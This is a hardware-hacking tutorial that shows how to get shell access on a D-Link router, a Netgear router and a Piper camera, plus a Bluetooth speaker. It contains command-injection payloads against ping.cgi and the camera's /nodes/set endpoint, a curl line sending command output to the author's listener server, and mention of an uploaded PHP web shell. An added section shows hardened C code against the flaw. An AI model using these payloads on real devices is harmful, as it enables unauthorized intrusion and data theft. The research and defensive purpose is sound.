# Cheap Hardware (How to be a Majdalawi 101)

Welcome to my hardware hacking session! In this session we are going to explore some common tips and tricks in hardware hacking, and of course we will try some hacks!

## Hacking the D-Link DSL-225

First, let's begin with something simple! This router costs about 10 NIS, which is a great deal for a Linux machine!

<center>

![D-Link DSL-225](https://i.imgur.com/9f8SyPD.png =300x)

DSL-225

</center>

Now let's turn on the router and play around with the control panel to see if there is something interesting.

<center>

![Remote management settings](https://i.imgur.com/Q46TNWr.png =400x)

Remote Management Settings

</center>

Nice, we have SSH and Telnet 🥳

<center>

![Terminal](https://i.imgur.com/l8pl03g.png =400x)

Custom D-Link terminal

</center>

Alas, the joy was short-lived: this is a custom shell which doesn't let us control the whole machine 😟.

Wait... we have some commands like `ping` and `echo`; let's try to inject through them!

<center>

![Hooray, `ls` executed](https://i.imgur.com/tDjI3cL.png)

Hooray, `ls` executed

</center>

Now we can execute any Linux command. We could also run `bash` with the command `echo $(bash >&2)`, which redirects bash's stdout to stderr so we can see it live! Notice that this is a Linux machine with a USB port; imagine what you could do with it!
**Bonus: if a system runs Linux, the vendor has to publish its source code modifications under the GPL license, so you can download the kernel, file system and more from the internet!**

So I've compiled the firmware with USB audio support and installed the needed applications and libraries, so now the router can play sound 😁

## Hacking the Netgear DGN2200

<center>

![Netgear DGN2200](https://i.imgur.com/1KJS9UG.png)

Netgear DGN2200

</center>

In this example we are going to dive a little bit into firmware reverse engineering. The first tool you should know about is the awesome `binwalk`, which walks through the binary and gives you hints about what is inside the firmware, and more!

<center>

![Binwalk output](https://i.imgur.com/7c7Xabn.png =500x)

Binwalk output

</center>

Notice that we have a `JFFS2` file system; we could use `jefferson` to extract it, or run `binwalk -e $FILE_NAME`.

<center>

![File System](https://i.imgur.com/l4T7NbG.png =500x)

Tada: now we have the file system

</center>

Now I've noticed that there are some diagnostic tools in the control panel, one of them being `ping`. Let's search for `ping.cgi`, which is the page that does that. You can use `grep` to search for text recursively:

```bash
grep "ping.cgi" -r .
```

<center>

![Grep output](https://i.imgur.com/VKEXzT3.png)

Grep output

</center>

So we have the binary `httpd`, which is an HTTP server. Let's reverse engineer it using `Ghidra` and look for that page's code!
```cpp=
// Ghidra decompilation of the ping.cgi handler in httpd (shown as found)
undefined4 FUN_0041cc90(undefined4 param_1,undefined4 param_2)
{
  undefined1 *puVar1;
  undefined local_210;
  undefined auStack527 [255];
  char acStack272 [256];

  puVar1 = &_mips_gp0_value;
  local_210 = 0;
  memset(auStack527,0,0xff);
  // user-controlled POST parameter, copied straight into the buffer
  websGetVar(param_1,"ping_IPAddr",&local_210);
  // the value is interpolated into a shell command line ...
  sprintf(acStack272,"ping -c 4 %s > %s",&local_210,"/tmp/diag.conf",puVar1);
  // ... and handed to the shell without any validation
  system(acStack272);
  sendPage2Client("DIAG_ping.htm",param_2);
  return 0;
}
```

Notice that the ping handler uses the `system` library function, which executes the string as a shell script, and there's no validation at all! Now you can execute any command you like ;)

```javascript=
fetch("http://10.0.0.138/ping.cgi", {
  "body": "ping_IPAddr=;ls -la",
  "method": "POST",
});
```

## Hacking the Piper Bhome Camera

<center>

![Piper Bhome](https://i.imgur.com/s8c2359.png =150x)

Piper Bhome

</center>

In this example we will follow another approach: we don't have the original firmware or a control panel for the device; what we have is a mobile application that lets us configure the camera.

Now, the first thing you should notice is that the camera creates a WiFi hotspot. After connecting to it, you will find that the camera has the IP `10.10.10.10`, with an `HTTPS` server running. Opening the page in the browser indicates that it requires a username and a password! Let's start analyzing the `apk` using `jadx`!

After loading the app, start looking for things you know, for example the IP of the camera.

<center>

![Search Results](https://i.imgur.com/cgZXRm4.png)

Search Results

</center>

```java=
public String a() {
    return "10.10.10.10";
}

public int b() {
    return 443;
}

public String c() {
    return "https";
}

public a a(String str) {
    if (str != null) {
        String[] split = str.split(":");
        a("Authorization", Credentials.basic(split[0], split[1]));
    }
    return this;
}
```

So here is what I found in that class. One of the most interesting parts right now is the `Authorization` header; let's see the references to the `a` method.
```java=
private a a(String str, DeviceApiRequest.Callbacks callbacks) {
    return new a(this.f156a, str, callbacks).a(this.f156a.D());
}

public a a(DeviceApiRequest.Callbacks callbacks) {
    return a("/wifi/networks", callbacks);
}

public a b(DeviceApiRequest.Callbacks callbacks) {
    a a2 = a(String.format(Locale.ENGLISH, "/nodes/set/%d", new Object[]{256}), callbacks);
    a2.a(JSONRequest.HttpMethod.POST);
    HashMap hashMap = new HashMap();
    hashMap.put("value", String.format(
        Locale.ENGLISH,
        "inject date \" && date -s @%s && echo\"",
        new Object[]{String.valueOf(System.currentTimeMillis() / 1000)}
    ));
    a2.b(new JSONObject(hashMap));
    return a2;
}
```

Now method `a` gets its value from `this.f156a.D()`, but the method `a b(DeviceApiRequest.Callbacks callbacks)` has something interesting: it's a Linux command!

```java=
public String D() {
    byte[] b2 = com.blacksumac.piper.util.e.b(
        this.r,
        this.r.getString(R.string.setup_credentials).getBytes()
    );
    if (b2 != null) {
        return new String(b2);
    }
    o.error("SETUP CREDENTIALS ARE NULL!");
    return null;
}
```

Now just follow the code and get your credentials ;)

```json=
{
  "data": null,
  "result_message": "HELLO",
  "device_id_hash": null,
  "api_version": "0.9.5",
  "serial_number": "CAB16480445",
  "hardware_revision": "VR",
  "software_version": "1.5.4",
  "machine_arch": "piper-nv"
}
```

Nice, now we are logged in! Let's return to the code with the command and send that request with this payload:

`{"value": "inject date \" && date -s @1670016277 && wget http://10.10.10.100:8000 \""}`

After starting an HTTP server, it works and I have received the request!
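The root cause in both the `ping.cgi` handler above and the camera's `/nodes/set/256` request is the same: a client-controlled string is spliced into a shell command line and handed to `system()`. As an added example that is not part of this writeup or any vendor's code, here is that pattern in C next to a hardened handler. The input is first checked against the shape it is supposed to have (an IPv4 literal for ping, a decimal timestamp for the date case) and then passed to `execvp()` as a single argv element, so no shell ever parses it. The function names and the use of `/tmp/diag.conf` as the output path are this example's own choices.

```c
/* Added example: unsafe command building (as in the decompiled ping.cgi
 * handler) beside a hardened version. Not vendor code; names are this
 * example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <arpa/inet.h>
#include <sys/wait.h>

#define OUT_FILE "/tmp/diag.conf"   /* output path, mirroring the decompiled handler */

/* The unsafe pattern: untrusted input interpolated into a shell command line.
 * This only builds the string (it never runs it) so the reader can see what
 * the shell would receive when the "IP address" is ";ls -la". */
int build_ping_cmdline_unsafe(char *out, size_t n, const char *ip)
{
    int len = snprintf(out, n, "ping -c 4 %s > %s", ip, OUT_FILE);
    return (len >= 0 && (size_t)len < n) ? 0 : -1;
}

/* Returns 1 if s is a well-formed dotted-quad IPv4 literal and nothing else.
 * inet_pton() accepts only "a.b.c.d"; any shell metacharacter fails. */
int is_valid_ipv4(const char *s)
{
    struct in_addr addr;
    if (s == NULL || strlen(s) > INET_ADDRSTRLEN - 1)
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* For the camera's date-setting endpoint the expected shape is a Unix
 * timestamp: decimal digits only, so "@<value>" can be one argv element. */
int is_valid_unix_timestamp(const char *s)
{
    size_t i, n;
    if (s == NULL || (n = strlen(s)) == 0 || n > 12)
        return 0;
    for (i = 0; i < n; i++)
        if (s[i] < '0' || s[i] > '9')
            return 0;
    return 1;
}

/* Hardened handler: validate first, then run ping with an argv array via
 * execvp(), so no shell ever parses the user-supplied value. Returns -1 if
 * the input is rejected (nothing is executed), otherwise ping's exit status. */
int run_ping_safe(const char *ip)
{
    if (!is_valid_ipv4(ip))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(OUT_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            _exit(127);
        dup2(fd, STDOUT_FILENO);   /* replaces the "> /tmp/diag.conf" redirection */
        close(fd);
        char *const argv[] = { "ping", "-c", "4", (char *)ip, NULL };
        execvp(argv[0], argv);     /* ip is a single argument, never re-parsed */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *injected = ";ls -la";   /* constructed input, as in the writeup's request */
    char cmd[512];

    build_ping_cmdline_unsafe(cmd, sizeof cmd, injected);
    printf("shell would receive: %s\n", cmd);
    printf("hardened handler on \"%s\" -> %d\n", injected, run_ping_safe(injected));
    printf("is_valid_ipv4(\"10.0.0.138\") = %d\n", is_valid_ipv4("10.0.0.138"));
    printf("is_valid_unix_timestamp(\"1670016277\") = %d\n", is_valid_unix_timestamp("1670016277"));
    return 0;
}
```

Running it prints the exact line the shell would see for `;ls -la`, while `run_ping_safe()` returns -1 for the same input without forking anything. The same two checks are what a WAF or device log should flag: a `ping_IPAddr` or `value` field that is not a bare address or number is a request to alert on, not to execute.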
**Usually I would use Netcat, but unfortunately it's not installed on the camera.**

Now I created a simple HTTP server, which will receive the output of the commands I execute:

```javascript=
var http = require('http');
var express = require('express');

var app = express();
// accept any content type as a raw Buffer so the body is logged verbatim
app.use(express.raw({type: "*/*"}));
app.use((req, res) => {
    console.log("--------------");
    console.log(req.body.toString());
    console.log("--------------");
    res.sendStatus(200);
});

var server = http.createServer(app);
server.listen(3000);
```

Now sending this payload will send the `ls` result as a POST request to my server!

`{"value": "inject date \" && date -s @1670016277 && curl -X POST http://10.10.10.100:3000 -d \"$(ls -la)\"\""}`

<center>

![Tada](https://i.imgur.com/7cinZYm.png)

Tada: the result of `ls`

</center>

I've noticed that there is a `php` file, so I've just uploaded a PHP terminal emulator to make my life easier!

## Hacking a Chinese Bluetooth speaker!

<center>

![Bluetooth Speaker](https://i.imgur.com/JLvunZJ.png =250x)

Bluetooth Speaker

</center>

Sorry, I won't cover this in much detail, but a lot of cheap speakers come from the same factory, and you can find that factory's original SDK. What you have to do is generate a specific signal (using any microcontroller) that puts the speaker into programming mode; then you can compile anything you like and upload it to the speaker!

## Last Tip

If you couldn't execute anything, or couldn't find any exploit, there is always a way: first try to connect to the device over a serial port (using a USB to TTL converter), or read the flash using a programmer and analyze it!

<center>**Thanks all ;)**</center>